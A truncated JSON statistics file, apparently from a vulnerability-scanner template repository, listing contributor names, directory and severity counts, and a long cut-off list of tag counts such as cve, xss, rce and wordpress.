ost","count":1},{"name":"patralos","count":1},{"name":"0xceeb","count":1},{"name":"becivells","count":1},{"name":"daviey","count":1},{"name":"0xteles","count":1},{"name":"pdp","count":1},{"name":"stupidfish","count":1},{"name":"h4kux","count":1},{"name":"official_blackhat13","count":1},{"name":"adilsoybali","count":1},{"name":"tirtha_mandal","count":1},{"name":"dmartyn","count":1},{"name":"sshell","count":1},{"name":"viondexd","count":1},{"name":"w0tx","count":1},{"name":"caon","count":1},{"name":"andysvints","count":1},{"name":"erethon","count":1},{"name":"intx0x80","count":1},{"name":"shockwave","count":1},{"name":"whotwagner","count":1},{"name":"hczdmr","count":1},{"name":"osamahamad","count":1},{"name":"sherlocksecurity","count":1},{"name":"ptonewreckin","count":1},{"name":"jbaines-r7","count":1},{"name":"y0no","count":1},{"name":"yusakie","count":1},{"name":"natto97","count":1},{"name":"furkansayim","count":1},{"name":"httpvoid","count":1},{"name":"xc1ym","count":1},{"name":"toufik-airane","count":1},{"name":"rubina119","count":1},{"name":"rivalsec","count":1},{"name":"jeya.seelan","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"myst7ic","count":1},{"name":"ola456","count":1},{"name":"affix","count":1},{"name":"harryha","count":1},{"name":"hexcat","count":1},{"name":"guax1","count":1},{"name":"rodnt","count":1},{"name":"brianlam38","count":1},{"name":"un-fmunozs","count":1},{"name":"lamscun","count":1},{"name":"xshuden","count":1},{"name":"jfbes","count":1},{"name":"iampritam","count":1},{"name":"infosecsanyam","count":1},{"name":"breno_css","count":1},{"name":"noamrathaus","count":1},{"name":"exceed","count":1},{"name":"xeldax","count":1},{"name":"ledoubletake","count":1},{"name":"queencitycyber","count":1},{"name":"0xcharan","count":1},{"name":"cbadke","count":1},{"name":"josecosta","count":1},{"name":"couskito","count":1},{"name":"lixts","count":1},{"name":"archer","count":1},{"name":"byobin","count":1},{"name":"ynnirc","count":1},{"name":"bughuntersurya","count":1},{"name":"aravind","count":1},{"name":"rojanrijal","count":1},{"name":"xcapri","count":1},{"name":"0h1in9e","count":1},{"name":"jna1","count":1},{"name":"yavolo","count":1},{"name":"willd96","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"joaonevess","count":1},{"name":"schniggie","count":1},{"name":"phyr3wall","count":1},{"name":"0xrod","count":1},{"name":"smaranchand","count":1},{"name":"jiheon-dev","count":1},{"name":"piyushchhiroliya","count":1},{"name":"dwbzn","count":1},{"name":"j33n1k4","count":1},{"name":"realexp3rt","count":1},{"name":"evolutionsec","count":1},{"name":"houdinis","count":1},{"name":"apt-mirror","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ofjaaah","count":1},{"name":"zinminphy0","count":1},{"name":"kresec","count":1},{"name":"dorkerdevil","count":1},{"name":"ipanda","count":1},{"name":"gpiechnik2","count":1},{"name":"borna nematzadeh","count":1},{"name":"pratik khalane","count":1},{"name":"ruppde","count":1},{"name":"1nf1n7y","count":1},{"name":"k3rwin","count":1},{"name":"exid","count":1},{"name":"justmumu","count":1},{"name":"open-sec","count":1},{"name":"numan türle","count":1},{"name":"wpsec","count":1},{"name":"nobody","count":1},{"name":"mrcl0wnlab","count":1},{"name":"majidmc2","count":1},{"name":"chetgan","count":1},{"name":"wabafet","count":1},{"name":"arqsz","count":1},{"name":"elmahdi","count":1},{"name":"undefl0w","count":1},{"name":"jaimin gondaliya","count":1},{"name":"win3zz","count":1},{"name":"luciannitescu","count":1},{"name":"miryangjung","count":1},{"name":"aringo-bf","count":1},{"name":"juicypotato1","count":1},{"name":"arjunchandarana","count":1},{"name":"dale clarke","count":1},{"name":"colbyjack1134","count":1},{"name":"mabdullah22","count":1},{"name":"nagli","count":1},{"name":"nielsing","count":1},{"name":"sospiro","count":1},{"name":"philippdelteil","count":1},{"name":"secthebit","count":1},{"name":"nytr0gen","count":1},{"name":"_darrenmartyn","count":1},{"name":"palanichamy_perumal","count":1},{"name":"furkansenan","count":1},{"name":"kailashbohara","count":1},{"name":"abbas.heybati","count":1},{"name":"christbowel","count":1},{"name":"jcockhren","count":1},{"name":"rotembar","count":1},{"name":"djoevanka","count":1},{"name":"notwhy","count":1},{"name":"juliosmelo","count":1},{"name":"mah3sec_","count":1},{"name":"f1she3","count":1},{"name":"compr00t","count":1},{"name":"duty_1g","count":1},{"name":"remonsec","count":1},{"name":"retr02332","count":1},{"name":"b0yd","count":1},{"name":"jteles","count":1},{"name":"savik","count":1},{"name":"s1r1us","count":1},{"name":"technicaljunkie","count":1},{"name":"irshadahamed","count":1},{"name":"failopen","count":1},{"name":"davidfegyver","count":1},{"name":"omarkurt","count":1},{"name":"aaban solutions","count":1},{"name":"sinsinology","count":1},{"name":"am0nt31r0","count":1},{"name":"x6263","count":1},{"name":"jacalynli","count":1},{"name":"noah @thesubtlety","count":1},{"name":"mesaglio","count":1},{"name":"mr.bobo hp","count":1},{"name":"wlayzz","count":1},{"name":"chesterblue","count":1},{"name":"ap3r","count":1},{"name":"zsusac","count":1},{"name":"vikas kundu","count":1},{"name":"hakimkt","count":1},{"name":"th3r4id","count":1},{"name":"luskabol","count":1},{"name":"tangxiaofeng7","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"berkdusunur","count":1},{"name":"act1on3","count":1},{"name":"amnotacat","count":1},{"name":"therealtoastycat","count":1},{"name":"west-wise","count":1},{"name":"ilovebinbash","count":1},{"name":"akshansh","count":1},{"name":"whynotke","count":1},{"name":"ahmed abou-ela","count":1},{"name":"calumjelrick","count":1},{"name":"zn9988","count":1},{"name":"null_hypothesis","count":1},{"name":"paper-pen","count":1},{"name":"nuts7","count":1},{"name":"af001","count":1},{"name":"kareemse1im","count":1},{"name":"ramkrishna sawant","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"micha3lb3n","count":1},{"name":"m0ck3d","count":1},{"name":"regala_","count":1},{"name":"hakluke","count":1},{"name":"bartu utku sarp","count":1},{"name":"momen eldawakhly","count":1},{"name":"allenwest24","count":1},{"name":"amir-h-fallahi","count":1},{"name":"ndmalc","count":1},{"name":"aaronchen0","count":1},{"name":"pry0cc","count":1},{"name":"omarjezi","count":1},{"name":"manasmbellani","count":1},{"name":"s1r1u5_","count":1},{"name":"vulnspace","count":1},{"name":"jrolf","count":1},{"name":"sickwell","count":1},{"name":"elouhi","count":1},{"name":"shiar","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ldionmarcil","count":1},{"name":"dievus","count":1},{"name":"kiransau","count":1},{"name":"rinolock","count":1},{"name":"makyotox","count":1},{"name":"luqmaan hadia","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"danigoland","count":1},{"name":"r3nz0","count":1},{"name":"sak1","count":1},{"name":"mihhailsokolov","count":1},{"name":"notsoevilweasel","count":1},{"name":"nerrorsec","count":1},{"name":"yiran","count":1},{"name":"alevsk","count":1},{"name":"lingtren","count":1},{"name":"ooooooo_q","count":1},{"name":"amanrawat","count":1},{"name":"axrk","count":1},{"name":"d0rkerdevil","count":1},{"name":"dali","count":1},{"name":"amirmsafari","count":1},{"name":"clment cruchet","count":1},{"name":"0xparth","count":1},{"name":"blckraven","count":1},{"name":"manuelbua","count":1},{"name":"ahmed sherif","count":1},{"name":"pphuahua","count":1},{"name":"mammad_rahimzada","count":1},{"name":"orpheus","count":1},{"name":"matt miller","count":1},{"name":"tehtbl","count":1},{"name":"lark lab","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"mhdsamx","count":1},{"name":"spac3wh1te","count":1},{"name":"jub0bs","count":1},{"name":"hlop","count":1},{"name":"ok_bye_now","count":1},{"name":"danfaizer","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"unblvr1","count":1},{"name":"miroslavsotak","count":1},{"name":"petruknisme","count":1},{"name":"sorrowx3","count":1},{"name":"bugvsme","count":1},{"name":"b4uh0lz","count":1},{"name":"jeya seelan","count":1},{"name":"tim_koopmans","count":1},{"name":"co0nan","count":1},{"name":"pepitoh","count":1},{"name":"hyunsoo-ds","count":1},{"name":"booboohq","count":1},{"name":"brabbit10","count":1},{"name":"deena","count":1},{"name":"pbuff07","count":1},{"name":"miguelsegoviagil","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"h4sh5","count":1},{"name":"shiva (strobes security)","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"unkl4b","count":1},{"name":"pascalheidmann","count":1},{"name":"narluin","count":1},{"name":"godfatherorwa","count":1},{"name":"millermedia","count":1},{"name":"elitebaz","count":1},{"name":"mayankpandey01","count":1},{"name":"w8ay","count":1},{"name":"ohlinge","count":1},{"name":"ransomsec","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"professorabhay","count":1},{"name":"naglis","count":1},{"name":"ky9oss","count":1},{"name":"akokonunes","count":1},{"name":"anon-artist","count":1},{"name":"oscarintherocks","count":1},{"name":"opencirt","count":1},{"name":"flag007","count":1},{"name":"husain","count":1},{"name":"thelicato","count":1},{"name":"sanineng","count":1},{"name":"jc175","count":1},{"name":"mantissts","count":1},{"name":"topscoder","count":1},{"name":"zhenwarx","count":1},{"name":"hanlaomo","count":1},{"name":"shreyapohekar","count":1},{"name":"rschio","count":1},{"name":"0xceba","count":1},{"name":"metascan","count":1},{"name":"erikowen","count":1},{"name":"bjxsec","count":1},{"name":"carrot2","count":1},{"name":"higor melgaço","count":1},{"name":"charanrayudu","count":1},{"name":"michael wedl","count":1},{"name":"youngpope","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"fpatrik","count":1},{"name":"viniciuspereiras","count":1},{"name":"ringo","count":1},{"name":"egemenkochisarli","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"thebinitghimire","count":1},{"name":"fopina","count":1},{"name":"unp4ck","count":1},{"name":"xstp","count":1},{"name":"zandros0","count":1},{"name":"yaser_s","count":1},{"name":"t3l3machus","count":1},{"name":"ramondunker","count":1},{"name":"drfabiocastro","count":1},{"name":"8authur","count":1},{"name":"iphantasmic","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"mchklt","count":1},{"name":"2rs3c","count":1},{"name":"exploitation","count":1},{"name":"kiks7","count":1},{"name":"shelld3v","count":1},{"name":"dabla","count":1},{"name":"mordavid","count":1},{"name":"shifacyclewla","count":1},{"name":"galoget","count":1},{"name":"denandz","count":1},{"name":"aresx","count":1},{"name":"yashanand155","count":1},{"name":"invisiblethreat","count":1},{"name":"mlec","count":1},{"name":"olewagner","count":1},{"name":"freakyclown","count":1},{"name":"zeyad azima","count":1},{"name":"ling","count":1},{"name":"noobexploiter","count":1},{"name":"barthy.koeln","count":1},{"name":"udyz","count":1},{"name":"tirtha","count":1},{"name":"tea","count":1},{"name":"carlosvieira","count":1},{"name":"arall","count":1},{"name":"petergrifin","count":1},{"name":"alex","count":1},{"name":"watchtowr","count":1},{"name":"lady_bug","count":1},{"name":"skylark-lab","count":1},{"name":"yashgoti","count":1},{"name":"unknown","count":1},{"name":"floriandewald","count":1},{"name":"mubassirpatel","count":1},{"name":"screamy","count":1},{"name":"marcio mendes","count":1},{"name":"mbmy","count":1},{"name":"droberson","count":1},{"name":"kabirsuda","count":1},{"name":"hazana","count":1},{"name":"geraldino2","count":1},{"name":"arr0way","count":1},{"name":"mass0ma","count":1},{"name":"dk999","count":1},{"name":"th3.d1p4k","count":1},{"name":"alperenkesk","count":1},{"name":"shivampand3y","count":1},{"name":"rotemreiss","count":1},{"name":"pwnwithlove","count":1},{"name":"mukundbhuva","count":1},{"name":"thirukrishnan","count":1},{"name":"jas37","count":1},{"name":"absshax","count":1},{"name":"mariam tariq","count":1},{"name":"lstatro","count":1}],"directory":[{"name":"http","count":7306},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":136},{"name":"code","count":80},{"name":"javascript","count":55},{"name":"ssl","count":28},{"name":"dns","count":21},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cloud","count":9},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3621},{"name":"high","count":1635},{"name":"medium","count":1473},{"name":"critical","count":981},{"name":"low","count":258},{"name":"unknown","count":36}],"types":[{"name":"file","count":337},{"name":"dns","count":24}]}
+{"tags":[{"name":"cve","count":2490},{"name":"panel","count":1145},{"name":"wordpress","count":976},{"name":"exposure","count":916},{"name":"xss","count":906},{"name":"wp-plugin","count":847},{"name":"osint","count":804},{"name":"tech","count":682},{"name":"lfi","count":658},{"name":"misconfig","count":620},{"name":"edb","count":599},{"name":"rce","count":594},{"name":"packetstorm","count":530},{"name":"wpscan","count":497},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":421},{"name":"cve2023","count":374},{"name":"unauth","count":366},{"name":"sqli","count":357},{"name":"file","count":346},{"name":"authenticated","count":341},{"name":"intrusive","count":300},{"name":"detect","count":283},{"name":"login","count":276},{"name":"kev","count":268},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":215},{"name":"default-login","count":212},{"name":"osint-social","count":210},{"name":"token","count":193},{"name":"network","count":192},{"name":"","count":192},{"name":"apache","count":189},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":131},{"name":"ssrf","count":119},{"name":"install","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cms","count":112},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"disclosure","count":89},{"name":"aws-cloud-config","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":71},{"name":"cve2024","count":69},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"js","count":63},{"name":"adobe","count":62},{"name":"ir","count":61},{"name":"cve2015","count":59},{"name":"huntr","count":59},{"name":"atlassian","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"enum","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":43},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":40},{"name":"misc","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"tls","count":30},{"name":"wp-theme","count":30},{"name":"ec2","count":30},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"cve2012","count":26},{"name":"weaver","count":25},{"name":"ssh","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"osint-business","count":24},{"name":"dns","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"zoho","count":24},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"admin","count":23},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"xxe","count":23},{"name":"file-upload","count":23},{"name":"github","count":22},{"name":"s3","count":22},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":19},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"vpn","count":17},{"name":"node.js","count":17},{"name":"service","count":17},{"name":"confluence","count":17},{"name":"azure","count":17},{"name":"honeypot","count":17},{"name":"mail","count":17},{"name":"nginx","count":17},{"name":"microweber","count":16},{"name":"backup","count":16},{"name":"rconfig","count":16},{"name":"cve2009","count":16},{"name":"jarm","count":16},{"name":"osint-blog","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"magento","count":16},{"name":"dashboard","count":15},{"name":"nodejs","count":15},{"name":"cve2008","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"zyxel","count":15},{"name":"setup","count":15},{"name":"bypass","count":15},{"name":"tongda","count":15},{"name":"ssti","count":15},{"name":"installer","count":15},{"name":"java","count":15},{"name":"seeyon","count":15},{"name":"backdoor","count":15},{"name":"moosocial","count":15},{"name":"cnvd2021","count":15},{"name":"cve2013","count":15},{"name":"auth","count":14},{"name":"redhat","count":14},{"name":"docker","count":14},{"name":"domainmod","count":14},{"name":"osint-health","count":14},{"name":"smb","count":14},{"name":"node","count":14},{"name":"dell","count":14},{"name":"npm","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"windows","count":14},{"name":"jboss","count":14},{"name":"nagios","count":14},{"name":"icewarp","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"osint-art","count":14},{"name":"netgear","count":13},{"name":"hashicorp","count":13},{"name":"airflow","count":13},{"name":"rails","count":13},{"name":"graphql","count":13},{"name":"ivanti","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"sonicwall","count":13},{"name":"osint-dating","count":13},{"name":"laravel","count":13},{"name":"mysql","count":13},{"name":"fortigate","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"doppler","count":12},{"name":"newrelic","count":12},{"name":"netsweeper","count":12},{"name":"kafka","count":12},{"name":"info-leak","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"prometheus","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"xstream","count":11},{"name":"fastjson","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"phpgurukul","count":11},{"name":"jolokia","count":11},{"name":"iis","count":11},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dahua","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"sitecore","count":10},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"dedecms","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"moodle","count":9},{"name":"vcenter","count":9},{"name":"facebook","count":9},{"name":"cnvd2020","count":9},{"name":"exchange","count":9},{"name":"sangfor","count":9},{"name":"lucee","count":9},{"name":"progress","count":9},{"name":"secret","count":9},{"name":"blind","count":9},{"name":"cloudtrail","count":9},{"name":"wso2","count":9},{"name":"elastic","count":9},{"name":"python","count":9},{"name":"sophos","count":9},{"name":"crlf","count":9},{"name":"pfsense","count":9},{"name":"gitea","count":9},{"name":"druid","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"opencats","count":9},{"name":"versa","count":9},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"ognl","count":8},{"name":"mlflow","count":8},{"name":"bucket","count":8},{"name":"discord","count":8},{"name":"error","count":8},{"name":"mirai","count":8},{"name":"recon","count":8},{"name":"gateway","count":8},{"name":"console","count":8},{"name":"cisco-switch","count":8},{"name":"microfocus","count":8},{"name":"phpinfo","count":8},{"name":"spotweb_project","count":8},{"name":"osint-news","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"config-audit","count":8},{"name":"emerge","count":8},{"name":"phpjabbers","count":8},{"name":"default-page","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"unauthenticated","count":8},{"name":"odoo","count":8},{"name":"huawei","count":8},{"name":"oauth","count":8},{"name":"wanhu","count":8},{"name":"nexus","count":8},{"name":"e-office","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"spotweb","count":8},{"name":"twitter","count":7},{"name":"keking","count":7},{"name":"nortekcontrol","count":7},{"name":"linkedin","count":7},{"name":"gogs","count":7},{"name":"fpd","count":7},{"name":"squirrelmail","count":7},{"name":"telesquare","count":7},{"name":"bloofox","count":7},{"name":"exploitdb","count":7},{"name":"f5","count":7},{"name":"filemanager","count":7},{"name":"instrusive","count":7},{"name":"database","count":7},{"name":"mongodb","count":7},{"name":"oos","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"nagiosxi","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"monstra","count":7},{"name":"rfi","count":7},{"name":"nacos","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"shopify","count":7},{"name":"blockchain","count":7},{"name":"contec","count":7},{"name":"maps","count":7},{"name":"cacti","count":7},{"name":"joomla\\!","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"activemq","count":7},{"name":"openemr","count":7},{"name":"pmb","count":7},{"name":"landray","count":7},{"name":"solarwinds","count":7},{"name":"moodating","count":7},{"name":"vpc","count":7},{"name":"teamcity","count":7},{"name":"slack","count":7},{"name":"gcp","count":6},{"name":"typo3","count":6},{"name":"splunk","count":6},{"name":"ldap","count":6},{"name":"servicenow","count":6},{"name":"magmi","count":6},{"name":"keycloak","count":6},{"name":"sql","count":6},{"name":"doctor-appointment-system","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"tikiwiki","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"paypal","count":6},{"name":"liferay","count":6},{"name":"synacor","count":6},{"name":"jamf","count":6},{"name":"zhiyuan","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"microstrategy","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"cobbler","count":6},{"name":"advantech","count":6},{"name":"webmin","count":6},{"name":"beyondtrust","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"jetty","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"geoserver","count":6},{"name":"log","count":6},{"name":"rat","count":6},{"name":"asus","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"kubelet","count":6},{"name":"couchdb","count":6},{"name":"leak","count":6},{"name":"sonarqube","count":6},{"name":"bmc","count":6},{"name":"openvpn","count":6},{"name":"sentry","count":5},{"name":"tenda","count":5},{"name":"apisix","count":5},{"name":"ethereum","count":5},{"name":"adb","count":5},{"name":"10web","count":5},{"name":"cve2007","count":5},{"name":"acm","count":5},{"name":"froxlor","count":5},{"name":"thedigitalcraft","count":5},{"name":"web3","count":5},{"name":"matrix","count":5},{"name":"terramaster","count":5},{"name":"metinfo","count":5},{"name":"craftcms","count":5},{"name":"awstats","count":5},{"name":"react","count":5},{"name":"chamilo","count":5},{"name":"agentejo","count":5},{"name":"avideo","count":5},{"name":"goanywhere","count":5},{"name":"zzzcms","count":5},{"name":"akamai","count":5},{"name":"hpe","count":5},{"name":"voip","count":5},{"name":"elementor","count":5},{"name":"axigen","count":5},{"name":"square","count":5},{"name":"gocd","count":5},{"name":"glpi-project","count":5},{"name":"avaya","count":5},{"name":"adminer","count":5},{"name":"jabber","count":5},{"name":"strapi","count":5},{"name":"wbce","count":5},{"name":"storage","count":5},{"name":"jupyter","count":5},{"name":"sysaid","count":5},{"name":"cdata","count":5},{"name":"xmlrpc","count":5},{"name":"paloaltonetworks","count":5},{"name":"qdpm","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"openfire","count":5},{"name":"nuuo","count":5},{"name":"qnap","count":5},{"name":"carrental","count":5},{"name":"pyload","count":5},{"name":"jwt","count":5},{"name":"hoteldruid","count":5},{"name":"percha","count":5},{"name":"webview","count":5},{"name":"openai","count":5},{"name":"graylog","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"parallels","count":5},{"name":"cloudflare","count":5},{"name":"genetechsolutions","count":5},{"name":"caucho","count":5},{"name":"open-emr","count":5},{"name":"totolink","count":5},{"name":"schneider-electric","count":5},{"name":"magmi_project","count":5},{"name":"fatpipe","count":5},{"name":"ems","count":5},{"name":"dionaea","count":5},{"name":"resin","count":5},{"name":"asana","count":5},{"name":"crushftp","count":5},{"name":"cnvd2023","count":5},{"name":"swagger","count":5},{"name":"hybris","count":5},{"name":"openstack","count":5},{"name":"redmine","count":5},{"name":"decision-center","count":5},{"name":"papercut","count":5},{"name":"firmware","count":5},{"name":"circarlife","count":5},{"name":"rseenet","count":5},{"name":"mssql","count":5},{"name":"kkfileview","count":5},{"name":"tibco","count":5},{"name":"sftp","count":5},{"name":"mikrotik","count":5},{"name":"easypost","count":4},{"name":"intelbras","count":4},{"name":"webkul","count":4},{"name":"stripe","count":4},{"name":"reprisesoftware","count":4},{"name":"harbor","count":4},{"name":"puppet","count":4},{"name":"pixie","count":4},{"name":"dom","count":4},{"name":"dolibarr","count":4},{"name":"kingsoft","count":4},{"name":"figma","count":4},{"name":"artifactory","count":4},{"name":"opencms","count":4},{"name":"env","count":4},{"name":"phppgadmin","count":4},{"name":"terra-master","count":4},{"name":"jellyfin","count":4},{"name":"webshell","count":4},{"name":"spark","count":4},{"name":"pentaho","count":4},{"name":"pmb_project","count":4},{"name":"casaos","count":4},{"name":"jsf","count":4},{"name":"wcs","count":4},{"name":"ghost","count":4},{"name":"grav","count":4},{"name":"aria","count":4},{"name":"okta","count":4},{"name":"dahuasecurity","count":4},{"name":"rabbitmq","count":4},{"name":"concrete","count":4},{"name":"metasploit","count":4},{"name":"mcafee","count":4},{"name":"codeigniter","count":4},{"name":"veronalabs","count":4},{"name":"osint-archived","count":4},{"name":"owncloud","count":4},{"name":"igniterealtime","count":4},{"name":"ray","count":4},{"name":"royalevent","count":4},{"name":"flink","count":4},{"name":"thinkcmf","count":4},{"name":"consul","count":4},{"name":"confluent","count":4},{"name":"mostra","count":4},{"name":"info","count":4},{"name":"cve2005","count":4},{"name":"prtg","count":4},{"name":"globalprotect","count":4},{"name":"photo","count":4},{"name":"kentico","count":4},{"name":"search","count":4},{"name":"checkpoint","count":4},{"name":"audiocodes","count":4},{"name":"djangoproject","count":4},{"name":"salesforce","count":4},{"name":"learnpress","count":4},{"name":"hospital_management_system_project","count":4},{"name":"harmistechnology","count":4},{"name":"metabase","count":4},{"name":"roxy","count":4},{"name":"flickr","count":4},{"name":"postmessage","count":4},{"name":"mautic","count":4},{"name":"eclipse","count":4},{"name":"angular","count":4},{"name":"creativeitem","count":4},{"name":"rubyonrails","count":4},{"name":"digitaldruid","count":4},{"name":"telegram","count":4},{"name":"mitel","count":4},{"name":"panos","count":4},{"name":"ebs","count":4},{"name":"bamboo","count":4},{"name":"aura","count":4},{"name":"cnvd2019","count":4},{"name":"pie-register","count":4},{"name":"d-link","count":4},{"name":"metersphere","count":4},{"name":"juniper","count":4},{"name":"moveit","count":4},{"name":"ternaria","count":4},{"name":"mostracms","count":4},{"name":"age-encryption","count":4},{"name":"linkerd","count":4},{"name":"pega","count":4},{"name":"joomlamo","count":4},{"name":"auieo","count":4},{"name":"fit2cloud","count":4},{"name":"jorani","count":4},{"name":"seagate","count":4},{"name":"aspose","count":4},{"name":"dotnet","count":4},{"name":"gnuboard","count":4},{"name":"nosqli","count":4},{"name":"sendgrid","count":4},{"name":"tiki","count":4},{"name":"kyocera","count":4},{"name":"h3c","count":4},{"name":"centos","count":4},{"name":"kevinlab","count":4},{"name":"shiro","count":4},{"name":"sugarcrm","count":4},{"name":"sound4","count":4},{"name":"jfrog","count":4},{"name":"churchcrm","count":4},{"name":"kibana","count":4},{"name":"cnvd2022","count":4},{"name":"httpd","count":4},{"name":"hongdian","count":4},{"name":"candidats","count":4},{"name":"wireguard","count":4},{"name":"rocketchat","count":4},{"name":"hongfan","count":4},{"name":"osgeo","count":4},{"name":"imgproxy","count":4},{"name":"heroku","count":4},{"name":"arcgis","count":4},{"name":"ampache","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"httpserver","count":4},{"name":"finicity","count":4},{"name":"newstatpress","count":4},{"name":"articatech","count":4},{"name":"umbraco","count":4},{"name":"springcloud","count":4},{"name":"os4ed","count":4},{"name":"mailchimp","count":4},{"name":"linksys","count":4},{"name":"mantisbt","count":4},{"name":"http","count":4},{"name":"horde","count":4},{"name":"bittrex","count":4},{"name":"linuxfoundation","count":4},{"name":"powerjob","count":4},{"name":"wpdevart","count